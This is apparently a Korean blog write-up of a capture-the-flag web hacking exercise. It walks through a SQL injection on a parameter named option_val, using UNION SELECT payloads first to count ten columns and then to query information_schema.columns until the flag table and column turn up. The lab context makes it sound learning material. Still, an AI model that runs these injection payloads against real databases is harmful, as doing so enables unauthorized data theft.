SQL Injection Point 1

50

SQL Injection 으로 flag를 찾아내자!

option_val에 Injection이 가능한 것을 확인 

 

예상되는 쿼리는 

select {컬럼} where {option_val} = {board_result} 형식으로 예상됨

 

 

username union select 1,2,3,4,5,6,7,8,9,10 #

를통해 사용하는 컬럼이 총 10개라는 것을 확인

where 절에 sqli_6를 넣으니 필터링 되는 듯하여 직접 다 찾음

flag_table 이라는 테이블 명 확인

 

username union select table_name,column_name,3,4,5,6,7,8,9,10 from information_schema.columns #

 

falg_table에 flag라는 컬럼이 존재 

확인

저작자표시

'웹 해킹 코스 > 과제' 카테고리의 다른 글

SQL Injection Point 3  (0) 2023.12.20
SQL Injection Point 2  (0) 2023.12.20
Blind SQL 자동화  (0) 2023.12.14
CTF Athentication Bypass(Login Bypass 4)  (2) 2023.12.03
CTF Athentication Bypass(Login Bypass 3)  (1) 2023.12.03

+ Recent posts

티스토리툴바